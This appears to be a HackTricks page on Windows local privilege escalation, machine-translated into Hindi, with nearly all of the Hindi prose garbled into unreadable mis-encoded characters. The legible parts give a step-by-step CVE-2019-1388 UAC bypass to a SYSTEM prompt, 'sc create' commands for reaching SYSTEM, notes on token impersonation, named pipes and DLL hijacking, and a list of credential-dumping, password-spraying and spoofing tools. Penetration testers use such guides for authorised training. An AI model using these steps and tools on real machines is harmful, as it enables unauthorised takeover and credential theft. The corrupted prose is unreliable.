рдпрд╣ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдФрд░ рдПрдХ рд╣реА рд╕рдордп рдореЗрдВ UAC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЙрд╕реА рднреЗрджреНрдпрддрд╛ рдХреЗ рд╕рд╛рдеред рдЗрд╕рдХреЗ рдЕрддрд┐рд░рд┐рдХреНрдд, рдХреБрдЫ рднреА рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ рдФрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рджреМрд░рд╛рди рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рдиреЗ рд╡рд╛рд▓рд╛ рдмрд╛рдЗрдирд░реА рдорд╛рдЗрдХреНрд░реЛрд╕реЙрдлреНрдЯ рджреНрд╡рд╛рд░рд╛ рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рдФрд░ рдЬрд╛рд░реА рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

рдХреБрдЫ рдкреНрд░рднрд╛рд╡рд┐рдд рд╕рд┐рд╕реНрдЯрдо рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╣реИрдВ:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

рдЗрд╕ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЪрд░рдгреЛрдВ рдХреЛ рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

рдЖрдкрдХреЗ рдкрд╛рд╕ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд GitHub рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдореЗрдВ рд╕рднреА рдЖрд╡рд╢реНрдпрдХ рдлрд╝рд╛рдЗрд▓реЗрдВ рдФрд░ рдЬрд╛рдирдХрд╛рд░реА рд╣реИрдВ:

https://github.com/jas502n/CVE-2019-1388

рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдордзреНрдпрдо рд╕реЗ рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ / UAC рдмрд╛рдпрдкрд╛рд╕

рдЗрд╕рд╕реЗ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдиреЗрдВ:

{% content-ref url="integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}

рдлрд┐рд░ UAC рдФрд░ UAC рдмрд╛рдпрдкрд╛рд╕ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕реЗ рдкрдврд╝реЗрдВ:

{% content-ref url="../authentication-credentials-uac-and-efs/uac-user-account-control.md" %} uac-user-account-control.md {% endcontent-ref %}

рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реЗ рд╕рд┐рд╕реНрдЯрдо рддрдХ

рдирдИ рд╕реЗрд╡рд╛

рдпрджрд┐ рдЖрдк рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдкрд░ рдЪрд▓ рд░рд╣реЗ рд╣реИрдВ, рддреЛ SYSTEM рдкрд░ рдкрд╛рд╕ рдХрд░рдирд╛ рдХреЗрд╡рд▓ рдПрдХ рдирдИ рд╕реЗрд╡рд╛ рдмрдирд╛рдХрд░ рдФрд░ рдЙрд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдХреЗ рдЖрд╕рд╛рди рд╣реЛ рд╕рдХрддрд╛ рд╣реИ:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

AlwaysInstallElevated

рдПрдХ рдЙрдЪреНрдЪ рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЖрдк AlwaysInstallElevated рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпреЛрдВ рдХреЛ рд╕рдХреНрд╖рдо рдХрд░рдиреЗ рдФрд░ рдПрдХ рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ .msi рд░реИрдкрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬрд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдФрд░ .msi рдкреИрдХреЗрдЬ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ рдХреЗ рд▓рд┐рдП рдпрд╣рд╛рдВ рдкрдврд╝реЗрдВред

High + SeImpersonate privilege to System

рдЖрдк рдХреЛрдб рдпрд╣рд╛рдВ рдЦреЛрдЬ рд╕рдХрддреЗ рд╣реИрдВред

From SeDebug + SeImpersonate to Full Token privileges

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдпреЗ рдЯреЛрдХрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ (рд╕рдВрднрд╡рддрдГ рдЖрдк рдЗрд╕реЗ рдкрд╣рд▓реЗ рд╕реЗ рдЙрдЪреНрдЪ рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдкрд╛рдПрдВрдЧреЗ), рддреЛ рдЖрдк рд▓рдЧрднрдЧ рдХрд┐рд╕реА рднреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ (рд╕рдВрд░рдХреНрд╖рд┐рдд рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдВ рдирд╣реАрдВ) SeDebug рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рдЦреЛрд▓рдиреЗ, рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдЯреЛрдХрди рдХреЙрдкреА рдХрд░рдиреЗ, рдФрд░ рдЙрд╕ рдЯреЛрдХрди рдХреЗ рд╕рд╛рде рдПрдХ рдордирдорд╛рдирд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдВрдЧреЗред
рдЗрд╕ рддрдХрдиреАрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЖрдорддреМрд░ рдкрд░ SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣реА рдХрд┐рд╕реА рднреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд╕рднреА рдЯреЛрдХрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЪреБрдирд╛ рдЬрд╛рддрд╛ рд╣реИ (рд╣рд╛рдБ, рдЖрдк рд╕рднреА рдЯреЛрдХрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рдмрд┐рдирд╛ SYSTEM рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдВ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ)ред
рдЖрдк рдПрдХ рдХреЛрдб рдХрд╛ рдЙрджрд╛рд╣рд░рдг рдпрд╣рд╛рдВ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рддрдХрдиреАрдХ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИред

Named Pipes

рдпрд╣ рддрдХрдиреАрдХ рдореАрдЯрд░рдкреНрд░реЗрдЯрд░ рджреНрд╡рд╛рд░рд╛ getsystem рдореЗрдВ рд╡реГрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рддреА рд╣реИред рдпрд╣ рддрдХрдиреАрдХ рдПрдХ рдкрд╛рдЗрдк рдмрдирд╛рдиреЗ рдФрд░ рдлрд┐рд░ рдЙрд╕ рдкрд╛рдЗрдк рдкрд░ рд▓рд┐рдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╕реЗрд╡рд╛ рдмрдирд╛рдиреЗ/рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рдкрд░ рдЖрдзрд╛рд░рд┐рдд рд╣реИред рдлрд┐рд░, рд╕рд░реНрд╡рд░ рдЬрд┐рд╕рдиреЗ SeImpersonate рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкрд╛рдЗрдк рдмрдирд╛рдпрд╛, рд╡рд╣ рдкрд╛рдЗрдк рдХреНрд▓рд╛рдЗрдВрдЯ (рд╕реЗрд╡рд╛) рдХреЗ рдЯреЛрдХрди рдХреЛ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдЧрд╛, рдЬрд┐рд╕рд╕реЗ SYSTEM рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╣реЛрдВрдЧреЗред
рдпрджрд┐ рдЖрдк рдирд╛рдо рдкрд╛рдЗрдк рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рддреЛ рдЖрдкрдХреЛ рдпрд╣ рдкрдврд╝рдирд╛ рдЪрд╛рд╣рд┐рдПред
рдпрджрд┐ рдЖрдк рдЙрдЪреНрдЪ рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рд╕реЗ SYSTEM рдореЗрдВ рдЬрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдирд╛рдо рдкрд╛рдЗрдк рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рдПрдХ рдЙрджрд╛рд╣рд░рдг рдкрдврд╝рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рддреЛ рдЖрдкрдХреЛ рдпрд╣ рдкрдврд╝рдирд╛ рдЪрд╛рд╣рд┐рдПред

Dll Hijacking

рдпрджрд┐ рдЖрдк рдПрдХ dll рдХреЛ рд╣рд╛рдИрдЬреИрдХ рдХрд░рдиреЗ рдореЗрдВ рд╕рдлрд▓ рд╣реЛрддреЗ рд╣реИрдВ рдЬреЛ SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рджреНрд╡рд╛рд░рд╛ рд▓реЛрдб рдХреА рдЬрд╛ рд░рд╣реА рд╣реИ, рддреЛ рдЖрдк рдЙрди рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЗ рд╕рд╛рде рдордирдорд╛рдирд╛ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдВрдЧреЗред рдЗрд╕рд▓рд┐рдП Dll Hijacking рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рднреА рдЙрдкрдпреЛрдЧреА рд╣реИ, рдФрд░, рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрд╣ рдЙрдЪреНрдЪ рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рдЕрдзрд┐рдХ рдЖрд╕рд╛рди рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕рдХреЗ рдкрд╛рд╕ dlls рдХреЛ рд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рдиреЗ рд╡рд╛рд▓реА рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдкрд░ рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рд╣реЛрдЧреАред
рдЖрдк Dll рд╣рд╛рдИрдЬреИрдХрд┐рдВрдЧ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рди рд╕рдХрддреЗ рд╣реИрдВ рдпрд╣рд╛рдВред

From Administrator or Network Service to System

{% embed url="https://github.com/sailay1996/RpcSsImpersonator" %}

From LOCAL SERVICE or NETWORK SERVICE to full privs

рдкрдврд╝реЗрдВ: https://github.com/itm4n/FullPowers

More help

Static impacket binaries

Useful tools

Windows рд╕реНрдерд╛рдиреАрдп рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐ рд╡реЗрдХреНрдЯрд░ рдХреА рдЦреЛрдЬ рдХреЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЕрдЪреНрдЫрд╛ рдЙрдкрдХрд░рдг: WinPEAS

PS

PrivescCheck
PowerSploit-Privesc(PowerUP) -- рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдФрд░ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ (рдпрд╣рд╛рдВ рдЬрд╛рдВрдЪреЗрдВ)ред рдкрддрд╛ рдЪрд▓рд╛ред
JAWS -- рдХреБрдЫ рд╕рдВрднрд╛рд╡рд┐рдд рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ рдФрд░ рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░ рдХрд░реЗрдВ (рдпрд╣рд╛рдВ рдЬрд╛рдВрдЪреЗрдВ)ред
privesc -- рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ
SessionGopher -- рдпрд╣ PuTTY, WinSCP, SuperPuTTY, FileZilla, рдФрд░ RDP рд╕рд╣реЗрдЬреЗ рдЧрдП рд╕рддреНрд░ рдХреА рдЬрд╛рдирдХрд╛рд░реА рдирд┐рдХрд╛рд▓рддрд╛ рд╣реИред рд╕реНрдерд╛рдиреАрдп рдореЗрдВ -Thorough рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред
Invoke-WCMDump -- рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдореИрдиреЗрдЬрд░ рд╕реЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдирд┐рдХрд╛рд▓рддрд╛ рд╣реИред рдкрддрд╛ рдЪрд▓рд╛ред
DomainPasswordSpray -- рдбреЛрдореЗрди рдХреЗ рдЪрд╛рд░реЛрдВ рдУрд░ рдПрдХрддреНрд░рд┐рдд рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рд╕реНрдкреНрд░реЗ рдХрд░реЗрдВ
Inveigh -- Inveigh рдПрдХ PowerShell ADIDNS/LLMNR/mDNS/NBNS рд╕реНрдкреВрдлрд░ рдФрд░ рдореИрди-рдЗрди-рдж-рдорд┐рдбрд▓ рдЙрдкрдХрд░рдг рд╣реИред
WindowsEnum -- рдмреБрдирд┐рдпрд╛рджреА privesc Windows рдПрдиреНрдпреВрдорд░реЗрд╢рди
Sherlock ~~~~ -- рдЬреНрдЮрд╛рдд privesc рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреА рдЦреЛрдЬ рдХрд░реЗрдВ (DEPRECATED for Watson)
WINspect -- рд╕реНрдерд╛рдиреАрдп рдЬрд╛рдВрдЪ (рдПрдбрдорд┐рди рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛)

Exe

Watson -- рдЬреНрдЮрд╛рдд privesc рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреА рдЦреЛрдЬ рдХрд░реЗрдВ (рдЗрд╕реЗ VisualStudio рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ) (рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд)
SeatBelt -- рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЦреЛрдЬ рдХреЗ рд▓рд┐рдП рд╣реЛрд╕реНрдЯ рдХрд╛ рдПрдиреНрдпреВрдорд░реЗрд╢рди рдХрд░рддрд╛ рд╣реИ (рдпрд╣ privesc рд╕реЗ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░ рдХрд░рдиреЗ рдХрд╛ рдЙрдкрдХрд░рдг рд╣реИ) (рд╕рдВрдХрд▓рди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ) (рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд)
LaZagne -- рдХрдИ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рд╕реЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдирд┐рдХрд╛рд▓рддрд╛ рд╣реИ (рдЧрд┐рдЯрд╣рдм рдореЗрдВ рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд exe)
SharpUP -- C# рдореЗрдВ PowerUp рдХрд╛ рдкреЛрд░реНрдЯ
Beroot ~~~~ -- рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ (рдЧрд┐рдЯрд╣рдм рдореЗрдВ рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп)ред рдЕрдиреБрд╢рдВрд╕рд┐рдд рдирд╣реАрдВред рдпрд╣ Win10 рдореЗрдВ рдареАрдХ рд╕реЗ рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддрд╛ред
Windows-Privesc-Check -- рд╕рдВрднрд╛рд╡рд┐рдд рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ (рдкрд╛рдпрдерди рд╕реЗ exe)ред рдЕрдиреБрд╢рдВрд╕рд┐рдд рдирд╣реАрдВред рдпрд╣ Win10 рдореЗрдВ рдареАрдХ рд╕реЗ рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддрд╛ред

Bat

winPEASbat -- рдЗрд╕ рдкреЛрд╕реНрдЯ рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рдЙрдкрдХрд░рдг (рдЗрд╕рдХрд╛ рд╕рд╣реА рддрд░реАрдХреЗ рд╕реЗ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП accesschk рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ рд▓реЗрдХрд┐рди рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИ)ред

Local

Windows-Exploit-Suggester -- systeminfo рдХреЗ рдЖрдЙрдЯрдкреБрдЯ рдХреЛ рдкрдврд╝рддрд╛ рд╣реИ рдФрд░ рдХрд╛рд░реНрдпрд╢реАрд▓ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯреНрд╕ рдХреА рд╕рд┐рдлрд╛рд░рд┐рд╢ рдХрд░рддрд╛ рд╣реИ (рд╕реНрдерд╛рдиреАрдп рдкрд╛рдпрдерди)
Windows Exploit Suggester Next Generation -- systeminfo рдХреЗ рдЖрдЙрдЯрдкреБрдЯ рдХреЛ рдкрдврд╝рддрд╛ рд╣реИ рдФрд░ рдХрд╛рд░реНрдпрд╢реАрд▓ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯреНрд╕ рдХреА рд╕рд┐рдлрд╛рд░рд┐рд╢ рдХрд░рддрд╛ рд╣реИ (рд╕реНрдерд╛рдиреАрдп рдкрд╛рдпрдерди)

Meterpreter

multi/recon/local_exploit_suggestor

рдЖрдкрдХреЛ рд╕рд╣реА рд╕рдВрд╕реНрдХрд░рдг рдХреЗ .NET рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдХреЛ рд╕рдВрдХрд▓рд┐рдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ (рдпрд╣рд╛рдВ рджреЗрдЦреЗрдВ)ред рдкреАрдбрд╝рд┐рдд рд╣реЛрд╕реНрдЯ рдкрд░ рд╕реНрдерд╛рдкрд┐рдд .NET рдХреЗ рд╕рдВрд╕реНрдХрд░рдг рдХреЛ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

Bibliography

{% hint style="success" %} рд╕реАрдЦреЗрдВ рдФрд░ AWS рд╣реИрдХрд┐рдВрдЧ рдХрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:HackTricks Training AWS Red Team Expert (ARTE)
рд╕реАрдЦреЗрдВ рдФрд░ GCP рд╣реИрдХрд┐рдВрдЧ рдХрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
{% endhint %}